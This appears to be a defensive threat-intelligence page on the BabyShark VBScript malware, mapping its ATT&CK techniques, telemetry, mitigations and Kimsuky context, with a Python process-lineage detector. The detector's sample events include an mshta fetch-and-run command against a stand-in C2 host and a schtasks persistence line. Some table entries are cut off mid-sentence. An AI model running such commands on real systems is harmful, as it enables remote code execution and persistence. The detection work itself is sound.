S0414: BabyShark
Analyst context for executives and security teams
BabyShark matters because it represents a Windows VBScript-based malware family with behaviors that can support reconnaissance, execution, persistence, credential collection, command-and-control preparation, and cleanup. For leaders, the practical question is not whether a product “detects BabyShark,” but whether the organization can see script execution, Windows shell activity, registry and scheduled task changes, discovery commands, file staging, encoded traffic, and deletion activity quickly enough to support containment and investigation.
Executive priority
Prioritize this as a readiness check for Windows endpoint visibility, script-control governance, identity risk, and incident response evidence quality. The ATT&CK relationships connect BabyShark to techniques that often determine whether an intrusion remains a single-host event or becomes a broader investigation: persistence through scheduled tasks or run keys, credential exposure through keylogging, discovery of users/systems/files, and external tool transfer. Executives should ask whether SOC and IR teams can prove collection and retention of the evidence needed to reconstruct those behaviors.
Technical view
BabyShark is documented as Microsoft Visual Basic script-based malware on Windows. ATT&CK relationships show use of Visual Basic, Windows Command Shell, mshta, registry querying, scheduled tasks, registry run keys/startup folder, system/user/process/network/file discovery, ingress tool transfer, standard encoding, deobfuscation/decoding, keylogging, and file deletion. Detection engineering should validate behavior-based analytics around script interpreters and trusted Windows utilities launching suspicious child processes, creating persistence, performing clustered discovery, staging files, decoding content, and removing artifacts. Because MITRE does not provide an official detection section for this object, coverage should be validated against the related techniques rather than the malware name alone.
Likely telemetry
- Windows endpoint process creation events including command-line arguments and parent-child process relationships
- Script execution telemetry for VBScript/Visual Basic activity
- Windows Registry auditing for queried keys and persistence locations such as run keys
- Scheduled task creation, modification, and execution events
- File creation, modification, transfer/staging, and deletion events
Detection direction
- Validate detections for suspicious use of Visual Basic/VBScript, mshta.exe, and cmd.exe, especially when chained together or launched from unusual parent processes.
- Correlate discovery behaviors: registry queries, user discovery, process discovery, system information discovery, network configuration discovery, and file/directory enumeration occurring in close sequence.
- Monitor persistence changes via scheduled tasks and registry run keys/startup folders, with allowlists for approved administrative software to reduce false positives.
- Look for tool transfer followed by execution or decoding/deobfuscation activity; standard encoding alone is common, so detection should depend on context and process lineage.
- Treat file deletion after execution or staging as an investigation signal, especially when paired with script execution or persistence changes.
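As an added example (not code from the page, MITRE, or any vendor), the Python below runs the first three detection directions above over a constructed sample of Windows process-creation events: it restricts attention to children of a script interpreter, flags mshta.exe and persistence commands in that lineage, and raises a clustered-discovery alert when several distinct discovery techniques fire within a short window. The event format, host names, file paths and the c2.invalid hostname are all constructed for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of Windows process-creation events (timestamp|host|parent|image|command line).
# Not real telemetry; the hosts, paths and c2.invalid are made up to exercise the logic.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01|WS01|winword.exe|wscript.exe|wscript.exe C:\\Temp\\x.vbs
2024-05-01T10:00:03|WS01|wscript.exe|cmd.exe|cmd.exe /c whoami
2024-05-01T10:00:04|WS01|wscript.exe|cmd.exe|cmd.exe /c hostname
2024-05-01T10:00:05|WS01|wscript.exe|cmd.exe|cmd.exe /c ipconfig /all
2024-05-01T10:00:06|WS01|wscript.exe|cmd.exe|cmd.exe /c tasklist
2024-05-01T10:00:07|WS01|wscript.exe|cmd.exe|cmd.exe /c reg query HKCU\\Software
2024-05-01T10:00:09|WS01|wscript.exe|mshta.exe|mshta.exe http://c2.invalid/p.hta
2024-05-01T10:00:12|WS01|wscript.exe|schtasks.exe|schtasks /create /tn Upd /tr C:\\Temp\\u.vbs
2024-05-01T11:30:00|WS02|explorer.exe|cmd.exe|cmd.exe /c hostname
"""
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Command patterns mapped to the discovery and persistence techniques listed for BabyShark.
DISCOVERY = [(r"\bwhoami\b", "T1033"), (r"\b(hostname|systeminfo|ver)\b", "T1082"),
             (r"\b(ipconfig|netstat|arp)\b", "T1016"), (r"\btasklist\b", "T1057"),
             (r"\bdir\b", "T1083"), (r"\breg(\.exe)? query\b", "T1012")]
PERSISTENCE = [(r"\bschtasks(\.exe)? /create\b", "T1053.005"),
               (r"\breg(\.exe)? add\b.*\\Run\b", "T1547.001")]

def analyze(text, window=60, min_techniques=3):
    """Return {host: [(technique, reason, detail), ...]} for script-host process chains."""
    alerts, discovery = defaultdict(list), defaultdict(list)
    for line in text.strip().splitlines():
        ts, host, parent, image, cmd = line.split("|", 4)
        if parent.lower() not in SCRIPT_HOSTS:
            continue  # only children of a script interpreter are in scope here
        if image.lower() == "mshta.exe":
            alerts[host].append(("T1218.005", "mshta launched by script host", cmd))
        for pat, tid in PERSISTENCE:
            if re.search(pat, cmd, re.I):
                alerts[host].append((tid, "persistence created from script host", cmd))
        for pat, tid in DISCOVERY:
            if re.search(pat, cmd, re.I):
                discovery[host].append((datetime.fromisoformat(ts), tid))
    # Sliding window: flag >= min_techniques distinct discovery techniques within `window` seconds.
    for host, hits in discovery.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            seen = {tid for t, tid in hits[i:] if (t - t0).total_seconds() <= window}
            if len(seen) >= min_techniques:
                alerts[host].append(("discovery-cluster", "clustered discovery", sorted(seen)))
                break
    return dict(alerts)
```

The WS02 event is a lone hostname call under explorer.exe and produces nothing, which is the point of keying on process lineage rather than on individual commands.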
Mitigation priorities
- Harden Windows script execution paths and restrict unnecessary use of VBScript, mshta.exe, and command shell where business processes allow.
- Control persistence mechanisms by monitoring and limiting creation of scheduled tasks and registry run key/startup folder entries.
- Ensure endpoint logging, EDR, and Windows audit policies capture process, registry, scheduled task, file, and network evidence with sufficient retention for IR.
- Apply least privilege so user-context persistence and discovery have reduced operational reach.
- Strengthen credential protection and response playbooks for suspected keylogging or credential collection.
Analyst notes and limits
The supplied object identifies BabyShark as a Windows VBScript-based malware family and provides technique relationships that are useful for defensive validation. The strongest defensive value is mapping those relationships into control tests and telemetry checks. The relationship to Kimsuky and descriptions referencing North Korean campaigns should be handled as threat-intelligence context, not as standalone attribution for any local event.
MITRE provides no official detection text for this object, no object-level tactics, and no supplied procedure-level details beyond the listed relationships and references. This take therefore avoids claims about active exploitation, guaranteed detection, specific indicators, or customer exposure. Local endpoint, identity, and network evidence is required to determine actual activity and attribution.
BabyShark
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1053.005 | Scheduled Task Sub-technique | BabyShark has used scheduled tasks to maintain persistence. (Citation: Crowdstrike GTR2020 Mar 2020) |
| Enterprise | T1033 | System Owner/User Discovery | BabyShark has executed the |
| Enterprise | T1105 | Ingress Tool Transfer | BabyShark has downloaded additional files from the C2. (Citation: Unit42 BabyShark Apr 2019)(Citation: CISA AA20-301A Kimsuky) |
| Enterprise | T1012 | Query Registry | BabyShark has executed the |
| Enterprise | T1218.005 | Mshta Sub-technique | BabyShark has used mshta.exe to download and execute applications from a remote server. (Citation: CISA AA20-301A Kimsuky) |
| Enterprise | T1056.001 | Keylogging Sub-technique | BabyShark has a PowerShell-based remote administration ability that can implement a PowerShell or C# based keylogger. (Citation: Unit42 BabyShark Apr 2019) |
| Enterprise | T1057 | Process Discovery | BabyShark has executed the |
| Enterprise | T1059.005 | Visual Basic Sub-technique | BabyShark can execute additional Visual Basic content. (Citation: Mandiant APT43 March 2024) |
| Enterprise | T1083 | File and Directory Discovery | BabyShark has used |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | BabyShark has the ability to decode downloaded files prior to execution. (Citation: CISA AA20-301A Kimsuky) |
| Enterprise | T1082 | System Information Discovery | BabyShark has executed the |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | |
| Enterprise | T1070.004 | File Deletion Sub-technique | BabyShark has cleaned up all files associated with the secondary payload execution. (Citation: Unit42 BabyShark Apr 2019) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence. (Citation: Unit42 BabyShark Feb 2019)(Citation: CISA AA20-301A Kimsuky) |
| Enterprise | T1016 | System Network Configuration Discovery | BabyShark has executed the |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | BabyShark has used cmd.exe to execute commands. (Citation: Unit42 BabyShark Feb 2019) |
Groups, software, and campaigns
G0094: Kimsuky
Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.[1][2][3][4][5][6]
Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).[7][8][9] In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.[10]
DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group, rather than tracking operationally distinct subgroups.
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.0 | | Current bundle | 180e07105da0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Unit42 BabyShark Feb 2019: Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.
- [2] BabyShark: (Citation: Unit42 BabyShark Feb 2019)(Citation: Unit42 BabyShark Apr 2019)
- [3] LATEOP: (Citation: Mandiant APT43 March 2024)
- [4] Mandiant APT43 March 2024: Mandiant. (2024, March 14). APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations. Retrieved May 3, 2024.
- [5] Unit42 BabyShark Apr 2019: Lim, M. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat. Retrieved October 7, 2019.
- [6] mitre-attack S0414
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.